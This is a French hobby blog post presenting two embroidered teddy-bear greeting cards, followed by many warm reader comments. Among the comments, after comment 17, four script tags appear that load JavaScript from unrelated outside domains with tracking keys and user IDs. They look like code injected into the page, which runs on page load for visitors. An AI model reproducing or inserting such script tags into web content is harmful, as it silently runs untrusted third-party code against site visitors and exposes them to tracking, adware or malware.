• Carte de Voeux Ourson

     

     

    Carte de Voeux Ourson

     

    [ A Retrouver dans la Rubrique "Loisirs"-"Scrapbooking"-"Cartes de Vœux" ICI ]

     

     

    Voici deux cartes de Vœux avec broderie d' oursons trop mignons pour que je les ignore à les broder....

     

     

    Carte de Voeux Ourson

     

     

    La Première est faite sur l'exemple d'une carte de Pierrette et qui m'en avait envoyé un spécimen pour que je comprenne le principe...

     

     

    La Voici fermée....

     

     

    Carte de Voeux Ourson

     

     

     

     

    La Voici ouverte...

     

     

    Carte de Voeux Ourson

     

     

     

     

    Carte de Voeux Ourson

     

     

     

    Voici la deuxième...

     

     

    Carte de Voeux Ourson

     

     

     

     

    Carte de Voeux Ourson

     

    [ A Retrouver dans la Rubrique "Séparations"-"Hiver, Noël" ICI ]

     

     

     

     

     

    Carte de Voeux Ourson

     

    [ A Retrouver dans la Rubrique "Merci Visite"-"Hiver,Noël" ICI ]

     

     

     

     

     

    Carte de Voeux Ourson

     

    [ A Retrouver dans la Rubrique "Jours"-"Jeudi"-"Hiver" ICI ]

     

     


    Tags Tags : , , , , , , ,
  • Commentaires

    35
    Mercredi 25 Novembre 2020 à 19:23

    tes cartes sont superbes avec ces tites broderies trop craquante

    bisous

    34
    Lundi 23 Novembre 2020 à 21:33

    Celle pour Fidji est plus traditionnelle mais toute aussi belle !

    Bravo à toi

    Bisous

    33
    Lundi 23 Novembre 2020 à 10:43

    Coucou Valie

    Ta broderie est magnifique elle est bien mise en valeur .

    Bisous

    32
    Dimanche 22 Novembre 2020 à 20:29

    deux jolies cartes les oursons brodés sont trop mimi bonne soirée bisous liliane

    31
    Vendredi 20 Novembre 2020 à 19:33

    C'est tout mimi tes cartes avec ces oursons

    Bravo car tu travailles sur du petit format

    Bonne soirée

    Bisous

    30
    Vendredi 20 Novembre 2020 à 19:07

    Coucou ma belle Valie, je passe te souhaiter un beau week-end, ici on a 6 degrés et il vente en plus. Bisou rose tendresse !

    29
    Jeannine (cristal24)
    Vendredi 20 Novembre 2020 à 16:52

    Elles sont mignonnes tes broderies d'oursons et font de jolies cartes.  Bravo.

    Bonne fin de semaine.  Bises.

    Jeannine

    28
    Vendredi 20 Novembre 2020 à 08:22

    petits mots serie 2ma Valie , je la trouve magnifique ta carte, ouverte comme fermée, ce petit ourson est bien coquin , j adore les Teddy Bear, alors effectivement tu as bien fait de la faire, j espere que vous allez tous bien, moi hier je n ai pas pu me lever du tout, et ce matin je sens que je ne vais pas rester longtemps bien que j ai tout le matériel pour mon confort de fauteuil et de lit mais j avoue que je suis très faible mais je garde le cap mon Capitaine, bon week end et à bientot ma douce amie prends soin de toi

    27
    Jeudi 19 Novembre 2020 à 21:57

    Tes petites broderies sont superbes ;

    j'aime beaucoup le principe de fermeture de la première carte !

    Bonne fin de soirée ; bises / Nicole

    26
    Jeudi 19 Novembre 2020 à 20:25

    https://i.postimg.cc/HWQhgwpC/coucou-cmoi.gifTu prépares de bien belles cartes pour tes amies.  Bravo!

    https://i.postimg.cc/v835fThV/bisous-cath-valie.gif

    25
    Jeudi 19 Novembre 2020 à 17:20

    Toutes mignonettes tes cartes avec ourson. Bravo Vallie et à demain pour découvrir tes nouveautés

    Gros bisous

    24
    Jeudi 19 Novembre 2020 à 16:48

    C'est vraiment splendide ma belle Valie, passe une belle fin de journée, bisou rose tendresse !

    23
    Jeudi 19 Novembre 2020 à 14:02

    Adorables ces oursons brodés et superbement mis en carte ! Bravo Valie ! Bisous bisous !

    22
    Jeudi 19 Novembre 2020 à 13:56
    lamanuelle25

    Adorable ta carte, bises Nadine

    21
    Jeudi 19 Novembre 2020 à 13:27

    Des cartes spéciales avec se papier transparent et ce joli ourson.

    Bravo !

    Bonne après-midi.
    Bises.

    20
    marianne pirotte
    Jeudi 19 Novembre 2020 à 13:19

    Deux cartes super jolies, j'adore !!

    Bravo ma belle, gros bisous

    Marianne

    19
    Jeudi 19 Novembre 2020 à 13:18

    Bravo c'est très mignon tout ça, moi, je n'aurai plus la patience de faire de tels travaux de broderie...

    Bonne journée de jeudi Valie !

    18
    Jeudi 19 Novembre 2020 à 13:08

    Trop mimis ces tits ourson et oursonne , belle idée!

    Bisous et belle journée

    17
    mamijojo77100
    Jeudi 19 Novembre 2020 à 12:07

    tu est en pleine broderie et tu a raison CA TE VA BIEN..J aime les deux mais un clin d oeil pour l oursonne.. BRAVO en tout cas. et merci pour ton com de ce matin.. moi aussi je me suis bien amusee a crocheter les dies pour christelle. J ai mis presque un mois quand meme.. GBISOUS ET BON APM  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1605783899387" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    16
    Hélène
    Jeudi 19 Novembre 2020 à 11:07

    J'adore, tout comme ton décor. Tout est vraiment très joli. Ces petits oursons ont un côté "vintage" et nostalgique ! J'aime beaucoup et j'aime beaucoup ce que tu en as fait !

    Gros Bisous

    15
    Jeudi 19 Novembre 2020 à 10:52

    Trop belles tes cartes avec ces petits oursons et ces jolies broderies!! J'aime beaucoup, tu as des doigts de fée......

    Très belle ton ouverture pour ta première cartecoolyes

    Bisous et douce journée

    14
    Jeudi 19 Novembre 2020 à 10:27

    trop mignonne mais à choisir je préfère l'oursonne tes broderies sont adorables 

    bisous belle journée nous soleil au rdv

    cool

     

     

    13
    Jeudi 19 Novembre 2020 à 10:16

    Magnifiques broderies, ton oursonne est vraiment trop craquante, Lol !!!

    Douce journée ma toute Belle, prends bien soin de toi.

    Mille Bisous affectueux.

    12
    Jacline-H-49
    Jeudi 19 Novembre 2020 à 10:07

    Bonjour chère Valie,

    Ils sont à croquer tes oursons !  L'oursonne est trop mignonne. Joli travail de broderies, tes cartes vont faire des ravages ! 

    Bonne journée avec le soleil dans le ciel, et dans ton coeur. 

    GROS BISOUS TENDRESSE de 

    Jacline

     

    11
    Jeudi 19 Novembre 2020 à 10:05
    Ses une très jolie carte de vœux avec un joli thème bonne journée bisous
    10
    Jeudi 19 Novembre 2020 à 09:58
    dane

    coucou cette petite carte est adorable c' est d' une minutie bravo belle journée ma belle bisous

    9
    Jour de mai
    Jeudi 19 Novembre 2020 à 09:51

    Coucou Valie, 

    Avec le décor de ton blog, on ne peut s'attendre qu'à des travaux qui sont en rapport et là qu'ils sont mignons ces petits oursons, j'aimerais bien retomber en enfance mais au fond de moi il y a toujours une part qui est restée. 

    Bravo, les borderies sont superbes et les montages sur cartes rendent très bien. 

    Belle journée quoi que tu fasses, il y a toujours à faire mais après continues à nous enchanter. 

    Gros bisous ♥♥♥

    LN

    8
    Jeudi 19 Novembre 2020 à 09:11

    Superbe, ce décor! Merci pour ce travail! 

    yesTrès bonne journée de jeudi à toutes!

    7
    Jeudi 19 Novembre 2020 à 08:52

    Hooo "c'est cro mignon" comme disaient mes petits enfants. Bonne journée. Gros bisous

    6
    Jeudi 19 Novembre 2020 à 08:47

    Waouh  !!!  j'adore     ces  oursons  sont  superbes   et  leur  mise  en  cartes  aussi

    bravo  de  vrais  oursons  d'antan   

    gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    5
    Jeudi 19 Novembre 2020 à 08:44

    on retomberait volontiers en enfance grâce à toi (quoique ? est ce que je l'ai quittée ?) BRAVO!! plein de bisous. Si j'osais, je te demanderai ou de me remettre le fonds de noel stp ou de m'en refaire un ou hiver, selon ton temps et ton envie carte blanche ! (couleur bleu et blanc si possible, doré...) un immense merci d'avance et seulement si tu as le temps bonne journée bisous

    4
    Gaelle
    Jeudi 19 Novembre 2020 à 08:29
    Tes oursons sont trop mignons et brodé en plus, c'est magnifique. Tes cartes surtout le mécanisme d la première donne une autre dimension a la carte. Bravo
    Biz
    Gaelle
    3
    Jeudi 19 Novembre 2020 à 07:48

    Elles sont chouettes tes cartes oursons. J'avoue ces oursons sont déjà super mignons et je trouve ça très sympa de la façon dont tu as utilisés tes broderies sur tes cartes. 

    Bises

    Thaly

    2
    qinoa
    Jeudi 19 Novembre 2020 à 07:45

    trop mignon ces oursons et bravo pour cette carte qui s'ouvre. J'admire aussi ta banderole, bravo pour l'atmosphère hivernale

    bzz et douce journée

    1
    Jeudi 19 Novembre 2020 à 07:35

    Bonjour ma Valie, elles sont divines tes deux cartes brodées.. Bravo à toi....J'ai trouvé quelques motifs sur le net, je vais peut être me remettre au Pergamano, cette activité me manque...

    Passe un bon jeudi

    Gros bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :